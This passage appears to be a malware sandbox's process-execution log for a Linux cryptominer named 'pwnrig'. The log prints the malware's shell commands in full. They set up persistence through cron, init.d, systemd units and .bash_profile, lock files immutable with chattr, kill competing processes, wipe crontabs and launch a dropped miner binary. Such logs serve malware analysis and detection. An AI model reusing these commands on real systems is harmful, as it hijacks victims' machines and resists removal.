3⤵
PID:3388

/usr/sbin/update-rc.d
update-rc.d -f pwnrig disable
3⤵
- Flushes firewall rules
PID:3389

/usr/local/sbin/systemctl
systemctl --quiet disable pwnrig
4⤵
PID:3390

/usr/local/bin/systemctl
systemctl --quiet disable pwnrig
4⤵
PID:3390

/usr/sbin/systemctl
systemctl --quiet disable pwnrig
4⤵
PID:3390

/usr/bin/systemctl
systemctl --quiet disable pwnrig
4⤵
- Reads EFI boot settings
PID:3390

/usr/local/sbin/systemctl
systemctl daemon-reload
4⤵
PID:3416

/usr/local/bin/systemctl
systemctl daemon-reload
4⤵
PID:3416

/usr/sbin/systemctl
systemctl daemon-reload
4⤵
PID:3416

/usr/bin/systemctl
systemctl daemon-reload
4⤵
- Reads EFI boot settings
PID:3416

/usr/sbin/update-rc.d
update-rc.d -f pwnrig remove
3⤵
PID:3442

/usr/local/sbin/systemctl
systemctl daemon-reload
4⤵
PID:3443

/usr/local/bin/systemctl
systemctl daemon-reload
4⤵
PID:3443

/usr/sbin/systemctl
systemctl daemon-reload
4⤵
PID:3443

/usr/bin/systemctl
systemctl daemon-reload
4⤵
- Reads EFI boot settings
- Enumerates kernel/hardware configuration
PID:3443

/usr/bin/rm
rm -rf /bin/initdr
3⤵
PID:3469

/usr/bin/cp
cp -f -r -- /tmp/service-agent /bin/initdr
3⤵
- Writes file to system bin folder
PID:3470

/usr/bin/tee
tee /etc/init.d/pwnrig
3⤵
- Modifies init.d
PID:3472

/usr/bin/sed
sed -i "1 s/-e //" /etc/init.d/pwnrig
3⤵
- Modifies init.d
PID:3473

/usr/bin/chmod
chmod +x /etc/init.d/pwnrig /bin/initdr
3⤵
PID:3474

/usr/sbin/update-rc.d
update-rc.d pwnrig defaults
3⤵
PID:3475

/usr/local/sbin/systemctl
systemctl daemon-reload
4⤵
PID:3476

/usr/local/bin/systemctl
systemctl daemon-reload
4⤵
PID:3476

/usr/sbin/systemctl
systemctl daemon-reload
4⤵
PID:3476

/usr/bin/systemctl
systemctl daemon-reload
4⤵
- Reads EFI boot settings
PID:3476

/usr/sbin/update-rc.d
update-rc.d pwnrig enable
3⤵
PID:3532

/usr/local/sbin/systemctl
systemctl --quiet enable pwnrig
4⤵
PID:3537

/usr/local/bin/systemctl
systemctl --quiet enable pwnrig
4⤵
PID:3537

/usr/sbin/systemctl
systemctl --quiet enable pwnrig
4⤵
PID:3537

/usr/bin/systemctl
systemctl --quiet enable pwnrig
4⤵
- Reads EFI boot settings
PID:3537

/usr/local/sbin/systemctl
systemctl daemon-reload
4⤵
PID:3539

/usr/local/bin/systemctl
systemctl daemon-reload
4⤵
PID:3539

/usr/sbin/systemctl
systemctl daemon-reload
4⤵
PID:3539

/usr/bin/systemctl
systemctl daemon-reload
4⤵
- Reads EFI boot settings
PID:3539

/usr/bin/chattr
chattr +i +a /etc/init.d/pwnrig /bin/initdr
3⤵
PID:3567

/usr/bin/which
which systemctl
3⤵
PID:3568

/usr/bin/chattr
chattr -i -a /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service /bin/sysdr
3⤵
PID:3569

/usr/bin/rm
rm -rf /bin/sysdr
3⤵
PID:3570

/usr/bin/cp
cp -f -r -- /tmp/service-agent /bin/sysdr
3⤵
- Writes file to system bin folder
PID:3571

/usr/bin/tee
tee /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service
3⤵
- Modifies systemd
PID:3573

/usr/bin/sed
sed -i "1 s/-e //" /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service
3⤵
- Attempts to change immutable files
PID:3574

/usr/bin/chattr
chattr +i +a /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service /bin/sysdr
3⤵
PID:3575

/usr/bin/systemctl
systemctl enable pwnrige.service
3⤵
- Reads EFI boot settings
PID:3576

/usr/bin/systemctl
systemctl enable pwnrigl.service
3⤵
- Reads EFI boot settings
PID:3602

/usr/bin/systemctl
systemctl daemon-reload
3⤵
- Reads EFI boot settings
PID:3629

/usr/bin/systemctl
systemctl reload-or-restart pwnrige.service
3⤵
- Reads EFI boot settings
PID:3656

/usr/bin/hostname
hostname -I
1⤵
PID:3333

/usr/bin/awk
awk "{print \$1}"
1⤵
PID:3335

/usr/bin/awk
awk "{print \"-\"\$2}"
1⤵
PID:3340

/usr/bin/head
head -n 1
1⤵
PID:3339

/usr/bin/grep
grep "Port "
1⤵
PID:3338

/usr/bin/cat
cat /etc/ssh/sshd_config
1⤵
PID:3337

/usr/bin/sed
sed -e "s/\$//"
1⤵
PID:3349

/usr/bin/sed
sed -e "s/^ *//"
1⤵
PID:3348

/usr/bin/cut
cut -d: -f2
1⤵
PID:3347

/usr/bin/grep
grep -m 1 "model name" /proc/cpuinfo
1⤵
- Checks CPU configuration
PID:3346

/usr/bin/awk
awk "{print \$1}"
1⤵
PID:3352

/usr/bin/awk
awk "{print \$4}"
1⤵
PID:3355

/usr/bin/awk
awk "{print \$4}"
1⤵
PID:3358

/tmp/service-agent
/tmp/service-agent -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d
1⤵
- Executes dropped EXE
- Checks CPU configuration
- Checks hardware identifiers (DMI)
- Reads CPU attributes
- Reads hardware information
- Enumerates kernel/hardware configuration
- Writes file to tmp directory
PID:3712

/bin/sh
sh -c "echo \"[\$(hostname=\$(hostname -I 2>/dev/null || hostname -i 2>/dev/null);echo \$hostname | awk {'print \$1'} 2>/dev/null)\$(cat /etc/ssh/sshd_config 2>/dev/null | grep 'Port ' 2>/dev/null | head -n 1 2>/dev/null | awk {'print \"-\"\$2'} 2>/dev/null)][\$(whoami 2>/dev/null)][\$(hostname 2>/dev/null)][\$(grep -c ^processor /proc/cpuinfo 2>/dev/null)][\$(X=\$(grep -m 1 'model name' /proc/cpuinfo 2>/dev/null | cut -d: -f2 2>/dev/null | sed -e 's/^ *//' 2>/dev/null | sed -e 's/\$//' 2>/dev/null); if [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'QEMU' ]; then echo 'QEMU'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Haswell)' ]; then echo 'Haswell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Broadwell)' ]; then echo 'Broadwell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'AMD' ]; then echo \$X 2>/dev/null | awk {'print \$2\" \"\$3\" \"\$4'} 2>/dev/null; else echo \$X 2>/dev/null; fi)]\""
2⤵
PID:3738

/usr/bin/whoami
whoami
3⤵
PID:3749

/usr/bin/hostname
hostname
3⤵
PID:3750

/usr/bin/grep
grep -c "^processor" /proc/cpuinfo
3⤵
- Checks CPU configuration
PID:3751

/bin/sh
sh -c "ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[\$2]++ {print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done;if [ `id -u 2>/dev/null` -eq '0' ]; then ps x 2>/dev/null | grep /etc/cron 2>/dev/null | grep -v grep 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"
2⤵
PID:3767

/usr/bin/awk
awk "/[zZ]/ && !a[\$2]++ {print \$2}"
3⤵
PID:3769

/usr/bin/ps
ps -A "-ostat,ppid"
3⤵
- Reads CPU attributes
PID:3768

/usr/bin/id
id -u
3⤵
PID:3771

/usr/bin/grep
grep -v grep
3⤵
PID:3774

/usr/bin/grep
grep /etc/cron
3⤵
PID:3773

/usr/bin/ps
ps x
3⤵
- Reads CPU attributes
PID:3772

/bin/sh
sh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*\$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done else ps -u `whoami 2>/dev/null` ux | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*\$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"
2⤵
PID:3776

/usr/bin/id
id -u
3⤵
PID:3777

/usr/bin/awk
awk "{if(\$3>30.0) print \$2}"
3⤵
PID:3782

/usr/bin/grep
grep -v /usr/sbin/httpd
3⤵
PID:3781

/usr/bin/grep
grep -v -- "-bash[[:space:]]*\$"
3⤵
PID:3780

/usr/bin/grep
grep -v grep
3⤵
PID:3779

/usr/bin/ps
ps aux
3⤵
- Reads runtime system information
PID:3778

/bin/sh
sh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then if [ `ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi else myid=`whoami 2>/dev/null`; if [ `ps -u \$myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps -u \$myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi fi"
2⤵
PID:3784

/usr/bin/id
id -u
3⤵
PID:3785

/usr/bin/hostname
hostname -I
1⤵
PID:3741

/usr/bin/awk
awk "{print \$1}"
1⤵
PID:3743

/usr/bin/awk
awk "{print \"-\"\$2}"
1⤵
PID:3748

/usr/bin/head
head -n 1
1⤵
PID:3747

/usr/bin/grep
grep "Port "
1⤵
PID:3746

/usr/bin/cat
cat /etc/ssh/sshd_config
1⤵
PID:3745

/usr/bin/sed
sed -e "s/\$//"
1⤵
PID:3757

/usr/bin/sed
sed -e "s/^ *//"
1⤵
PID:3756

/usr/bin/cut
cut -d: -f2
1⤵
PID:3755

/usr/bin/grep
grep -m 1 "model name" /proc/cpuinfo
1⤵
- Checks CPU configuration
PID:3754

/usr/bin/awk
awk "{print \$1}"
1⤵
PID:3760

/usr/bin/awk
awk "{print \$4}"
1⤵
PID:3763

/usr/bin/awk
awk "{print \$4}"
1⤵
PID:3766

/usr/bin/awk
awk "{if(\$3>30.0) print \$2}"
1⤵
PID:3790

/usr/bin/wc
wc -l
1⤵
PID:3791

/usr/bin/grep
grep -- "-bash[[:space:]]*\$"
1⤵
PID:3789

/usr/bin/grep
grep -v grep
1⤵
PID:3788

/usr/bin/ps
ps aux
1⤵
- Reads runtime system information
PID:3787

/usr/bin/hostname
hostname -I
1⤵
PID:3871

/usr/bin/awk
awk "{print \$1}"
1⤵
PID:3873

/usr/bin/head
head -n 1
1⤵
PID:3877

/usr/bin/awk
awk "{print \"-\"\$2}"
1⤵
PID:3878

/usr/bin/grep
grep "Port "
1⤵
PID:3876

/usr/bin/cat
cat /etc/ssh/sshd_config
1⤵
PID:3875

/usr/bin/sed
sed -e "s/\$//"
1⤵
PID:3887

/usr/bin/sed
sed -e "s/^ *//"
1⤵
PID:3886

/usr/bin/cut
cut -d: -f2
1⤵
PID:3885

/usr/bin/grep
grep -m 1 "model name" /proc/cpuinfo
1⤵
- Checks CPU configuration
PID:3884

/usr/bin/awk
awk "{print \$1}"
1⤵
PID:3890

/usr/bin/awk
awk "{print \$4}"
1⤵
PID:3893

/usr/bin/awk
awk "{print \$4}"
1⤵
PID:3896

/usr/bin/hostname
hostname -I
1⤵
PID:4238

/usr/bin/awk
awk "{print \$1}"
1⤵
PID:4240

/usr/bin/awk
awk "{print \"-\"\$2}"
1⤵
PID:4245

/usr/bin/head
head -n 1
1⤵
PID:4244

/usr/bin/grep
grep "Port "
1⤵
PID:4243

/usr/bin/cat
cat /etc/ssh/sshd_config
1⤵
PID:4242

/usr/bin/sed
sed -e "s/\$//"
1⤵
PID:4254

/usr/bin/sed
sed -e "s/^ *//"
1⤵
PID:4253

/usr/bin/cut
cut -d: -f2
1⤵
PID:4252

/usr/bin/grep
grep -m 1 "model name" /proc/cpuinfo
1⤵
- Checks CPU configuration
PID:4251

/usr/bin/awk
awk "{print \$1}"
1⤵
PID:4257

/usr/bin/awk
awk "{print \$4}"
1⤵
PID:4260

/usr/bin/awk
awk "{print \$4}"
1⤵
PID:4263

/usr/bin/wc
wc -l
1⤵
PID:4288

/usr/bin/awk
awk "{if(\$3>30.0) print \$2}"
1⤵
PID:4287

/usr/bin/grep
grep -- "-bash[[:space:]]*\$"
1⤵
PID:4286

/usr/bin/grep
grep -v grep
1⤵
PID:4285

/usr/bin/ps
ps aux
1⤵
- Reads CPU attributes
- Reads runtime system information
PID:4284

/usr/bin/crontab
crontab -r
1⤵
PID:4289

/usr/bin/pkill
pkill -f .klibsystem5
1⤵
- Reads CPU attributes
- Reads runtime system information
PID:4290

/usr/bin/pkill
pkill -f .klibsystem4
1⤵
- Reads CPU attributes
PID:4291

/usr/bin/bash
bash -c "echo \"* * * * * /var/run/.klibsystem5 >/dev/null 2>&1\" | crontab -"
1⤵
PID:4292

/usr/bin/crontab
crontab -
2⤵
PID:4294

/usr/bin/chattr
chattr -ia /etc/cron.d/.lib-knlib4
1⤵
PID:4295

/usr/bin/chattr
chattr +ia /etc/cron.d/.lib-knlib4
1⤵
PID:4296

/usr/bin/chattr
chattr -ia /var/spool/cron/.lib-knlib4
1⤵
- Attempts to change immutable files
PID:4297

/usr/bin/chattr
chattr +ia /var/spool/cron/.lib-knlib4
1⤵
PID:4298

/usr/bin/chattr
chattr -ia /etc/cron.hourly/.lib-knlib4
1⤵
PID:4299

/usr/bin/chattr
chattr +ia /etc/cron.hourly/.lib-knlib4
1⤵
PID:4300

/usr/bin/chattr
chattr -ia /etc/cron.daily/.lib-knlib4
1⤵
PID:4301

/usr/bin/chattr
chattr +ia /etc/cron.daily/.lib-knlib4
1⤵
PID:4302

/usr/bin/chattr
chattr -ia /etc/cron.weekly/.lib-knlib4
1⤵
PID:4303

/usr/bin/chattr
chattr +ia /etc/cron.weekly/.lib-knlib4
1⤵
PID:4304

/usr/bin/chattr
chattr -ia /etc/cron.monthly/.lib-knlib4
1⤵
- Attempts to change immutable files
PID:4305

/usr/bin/chattr
chattr +ia /etc/cron.monthly/.lib-knlib4
1⤵
PID:4306

/usr/bin/chattr
chattr -ia /etc/anacrontab
1⤵
PID:4307

/usr/bin/chattr
chattr +ia /etc/anacrontab
1⤵
PID:4308

/tmp/sys-helper
/tmp/sys-helper
1⤵
- Executes dropped EXE
- Writes file to tmp directory
PID:4309

/tmp/service-agent
/tmp/service-agent -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d -pwn
1⤵
- Executes dropped EXE
- Checks CPU configuration
- Checks hardware identifiers (DMI)
- Reads CPU attributes
- Reads hardware information
- Enumerates kernel/hardware configuration
PID:4310

/bin/sh
sh -c "echo \"[\$(hostname=\$(hostname -I 2>/dev/null || hostname -i 2>/dev/null);echo \$hostname | awk {'print \$1'} 2>/dev/null)\$(cat /etc/ssh/sshd_config 2>/dev/null | grep 'Port ' 2>/dev/null | head -n 1 2>/dev/null | awk {'print \"-\"\$2'} 2>/dev/null)][\$(whoami 2>/dev/null)][\$(hostname 2>/dev/null)][\$(grep -c ^processor /proc/cpuinfo 2>/dev/null)][\$(X=\$(grep -m 1 'model name' /proc/cpuinfo 2>/dev/null | cut -d: -f2 2>/dev/null | sed -e 's/^ *//' 2>/dev/null | sed -e 's/\$//' 2>/dev/null); if [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'QEMU' ]; then echo 'QEMU'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Haswell)' ]; then echo 'Haswell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Broadwell)' ]; then echo 'Broadwell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'AMD' ]; then echo \$X 2>/dev/null | awk {'print \$2\" \"\$3\" \"\$4'} 2>/dev/null; else echo \$X 2>/dev/null; fi)]\""
2⤵
- Attempts to change immutable files
PID:4311

/usr/bin/whoami
whoami
3⤵
PID:4322

/usr/bin/hostname
hostname
3⤵
PID:4323

/usr/bin/grep
grep -c "^processor" /proc/cpuinfo
3⤵
- Checks CPU configuration
PID:4324

/bin/sh
sh -c "ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[\$2]++ {print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done;if [ `id -u 2>/dev/null` -eq '0' ]; then ps x 2>/dev/null | grep /etc/cron 2>/dev/null | grep -v grep 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"
2⤵
PID:4340

/usr/bin/awk
awk "/[zZ]/ && !a[\$2]++ {print \$2}"
3⤵
PID:4342

/usr/bin/ps
ps -A "-ostat,ppid"
3⤵
- Reads CPU attributes
PID:4341

/usr/bin/id
id -u
3⤵
PID:4344

/usr/bin/grep
grep -v grep
3⤵
PID:4347

/usr/bin/grep
grep /etc/cron
3⤵
PID:4346

/usr/bin/ps
ps x
3⤵
PID:4345

/bin/sh
sh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then SNIFFDIR='/bin';PWNDIR='/bin'; else rm -rf /tmp/.pwn 2>/dev/null;mkdir /tmp/.pwn 2>/dev/null;SNIFFDIR='/tmp/.pwn';PWNDIR='/tmp';fi;PWNRIG='pwnrig';PWNRIGE='pwnrige';PWNRIGL='pwnrigl';CROND='crondr';SYSD='sysdr';INITD='initdr';BPROFILE='bprofr';MINER='/tmp/service-agent';PROGRAM='-bash';if [ `id -u 2>/dev/null` -eq '0' ]; then chattr -i -a \$SNIFFDIR/\$BPROFILE ~/.bash_profile >/dev/null 2>&1;fi;rm -rf \$SNIFFDIR/\$BPROFILE 2>/dev/null;sed -i \"/\$BPROFILE/d\" ~/.bash_profile 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$BPROFILE 2>/dev/null;echo \"cp -f -r -- \$SNIFFDIR/\$BPROFILE \$PWNDIR/\$PROGRAM 2>/dev/null && \$PWNDIR/\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1 && rm -rf -- \$PWNDIR/\$PROGRAM 2>/dev/null\" >> ~/.bash_profile 2>/dev/null;if [ `id -u 2>/dev/null` -eq '0' ]; then chattr +i +a \$SNIFFDIR/\$BPROFILE ~/.bash_profile >/dev/null 2>&1;mkdir -p /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly 2>/dev/null;chattr -i -a /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$CROND 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$CROND 2>/dev/null;echo -e \"#!/bin/bash\\ncp -f -r -- \$SNIFFDIR/\$CROND \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/cron.d/\$PWNRIG /etc/cron.daily/\$PWNRIG /etc/cron.hourly/\$PWNRIG /etc/cron.monthly/\$PWNRIG /etc/cron.weekly/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/cron.*/\$PWNRIG 2>/dev/null;chmod +x /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND 2>/dev/null;chattr +i +a /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND >/dev/null 2>&1;if which chkconfig > /dev/null 2>&1; then chattr -i -a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;chkconfig \$PWNRIG off 2>/dev/null;chkconfig --del \$PWNRIG 2>/dev/null;rm -rf \$SNIFFDIR/\$INITD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$INITD 2>/dev/null;echo -e \"#!/bin/bash\\n#\\n# \$PWNRIG Start/Stop the \$PWNRIG clock daemon.\\n#\\n# chkconfig: 2345 90 60\\n# description: \$PWNRIG (by pwned)\\ncp -f -r -- \$SNIFFDIR/\$INITD \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d 2>/dev/null\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/init.d/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/init.d/\$PWNRIG 2>/dev/null;chmod +x /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD 2>/dev/null;chkconfig --add \$PWNRIG 2>/dev/null;chkconfig \$PWNRIG on 2>/dev/null;chattr +i +a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;fi;if which update-rc.d > /dev/null 2>&1; then chattr -i -a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;update-rc.d -f \$PWNRIG disable >/dev/null 2>&1;update-rc.d -f \$PWNRIG remove >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$INITD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$INITD 2>/dev/null;echo -e \"#!/bin/bash\\n### BEGIN INIT INFO\\n# Provides: \$PWNRIG\\n# Required-Start: \$all\\n# Required-Stop:\\n# Default-Start: 2 3 4 5\\n# Default-Stop:\\n# Short-Description: \$PWNRIG (by pwned)\\n### END INIT INFO\\ncp -f -r -- \$SNIFFDIR/\$INITD \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d 2>/dev/null\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/init.d/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/init.d/\$PWNRIG 2>/dev/null;chmod +x /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD 2>/dev/null;update-rc.d \$PWNRIG defaults >/dev/null 2>&1;update-rc.d \$PWNRIG enable >/dev/null 2>&1;chattr +i +a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;fi;if which systemctl > /dev/null 2>&1; then chattr -i -a /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service \$SNIFFDIR/\$SYSD >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$SYSD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$SYSD 2>/dev/null;echo -e \"[Unit]\\nDescription=\$PWNRIG\\n\\nWants=network.target\\nAfter=syslog.target network-online.target\\n\\n[Service]\\nType=forking\\nExecStart=/bin/bash -c 'cp -f -r -- \$SNIFFDIR/\$SYSD \$PWNDIR/\$PROGRAM 2>/dev/null && \$PWNDIR/\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1 && rm -rf -- \$PWNDIR/\$PROGRAM 2>/dev/null'\\nRestart=always\\nKillMode=process\\n\\n[Install]\\nWantedBy=multi-user.target\" | tee /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service >/dev/null;sed -i '1 s/-e //' /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service 2>/dev/null;chattr +i +a /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service \$SNIFFDIR/\$SYSD >/dev/null 2>&1;systemctl enable \$PWNRIGE.service 2> /dev/null;systemctl enable \$PWNRIGL.service 2> /dev/null;systemctl daemon-reload 2> /dev/null;systemctl reload-or-restart \$PWNRIGE.service 2> /dev/null;systemctl reload-or-restart \$PWNRIGL.service 2> /dev/null;fi;fi"
2⤵
- Writes file to tmp directory
PID:4349

/usr/bin/id
id -u
3⤵
PID:4350

/usr/bin/id
id -u
3⤵
PID:4351

/usr/bin/chattr
chattr -i -a /bin/bprofr "~/.bash_profile"
3⤵
PID:4352

/usr/bin/rm
rm -rf /bin/bprofr
3⤵
PID:4353

/usr/bin/sed
sed -i /bprofr/d "~/.bash_profile"
3⤵
- Attempts to change immutable files
PID:4354

/usr/bin/cp
cp -f -r -- /tmp/service-agent /bin/bprofr
3⤵
- Writes file to system bin folder
PID:4355

/usr/bin/id
id -u
3⤵
PID:4356

/usr/bin/chattr
chattr +i +a /bin/bprofr "~/.bash_profile"
3⤵
PID:4357

/usr/bin/mkdir
mkdir -p /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly
3⤵
PID:4358

/usr/bin/chattr
chattr -i -a /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr
3⤵
PID:4359

/usr/bin/rm
rm -rf /bin/crondr
3⤵
PID:4360

/usr/bin/cp
cp -f -r -- /tmp/service-agent /bin/crondr
3⤵
- Writes file to system bin folder
PID:4361

/usr/bin/tee
tee /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig
3⤵
- Creates/modifies Cron job
PID:4363

/usr/bin/sed
sed -i "1 s/-e //" /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig
3⤵
- Creates/modifies Cron job
PID:4364

/usr/bin/chmod
chmod +x /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr
3⤵
PID:4365

/usr/bin/chattr
chattr +i +a /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr
3⤵
- Attempts to change immutable files
PID:4366

/usr/bin/which
which chkconfig
3⤵
PID:4367

/usr/bin/which
which update-rc.d
3⤵
PID:4368

/usr/bin/chattr
chattr -i -a /etc/init.d/pwnrig /bin/initdr
3⤵
- Attempts to change immutable files
PID:4369

/usr/sbin/update-rc.d
update-rc.d -f pwnrig disable
3⤵
- Flushes firewall rules
PID:4370

/usr/local/sbin/systemctl
systemctl --quiet disable pwnrig
4⤵
PID:4371

/usr/local/bin/systemctl
systemctl --quiet disable pwnrig
4⤵
PID:4371

/usr/sbin/systemctl
systemctl --quiet disable pwnrig
4⤵
PID:4371

/usr/bin/systemctl
systemctl --quiet disable pwnrig
4⤵
- Reads EFI boot settings
PID:4371

/usr/local/sbin/systemctl
systemctl daemon-reload
4⤵
PID:4397

/usr/local/bin/systemctl
systemctl daemon-reload
4⤵
PID:4397

/usr/sbin/systemctl
systemctl daemon-reload
4⤵
PID:4397

/usr/bin/systemctl
systemctl daemon-reload
4⤵
- Reads EFI boot settings
PID:4397

/usr/sbin/update-rc.d
update-rc.d -f pwnrig remove
3⤵
PID:4423

/usr/local/sbin/systemctl
systemctl daemon-reload
4⤵
PID:4424

/usr/local/bin/systemctl
systemctl daemon-reload
4⤵
PID:4424

/usr/sbin/systemctl
systemctl daemon-reload
4⤵
PID:4424

/usr/bin/systemctl
systemctl daemon-reload
4⤵
- Reads EFI boot settings
PID:4424

/usr/bin/rm
rm -rf /bin/initdr
3⤵
PID:4450

/usr/bin/cp
cp -f -r -- /tmp/service-agent /bin/initdr
3⤵
- Writes file to system bin folder
PID:4451

/usr/bin/tee
tee /etc/init.d/pwnrig
3⤵
- Modifies init.d
PID:4453

/usr/bin/sed
sed -i "1 s/-e //" /etc/init.d/pwnrig
3⤵
- Attempts to change immutable files
- Modifies init.d
PID:4454

/usr/bin/chmod
chmod +x /etc/init.d/pwnrig /bin/initdr
3⤵
PID:4455

/usr/sbin/update-rc.d
update-rc.d pwnrig defaults
3⤵
PID:4456

/usr/bin/chattr
chattr +i +a /etc/init.d/pwnrig /bin/initdr
3⤵
- Attempts to change immutable files
PID:4511

/usr/bin/which
which systemctl
3⤵
PID:4512

/usr/bin/chattr
chattr -i -a /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service /bin/sysdr
3⤵
PID:4513

/usr/bin/rm
rm -rf /bin/sysdr
3⤵
PID:4514

/usr/bin/cp
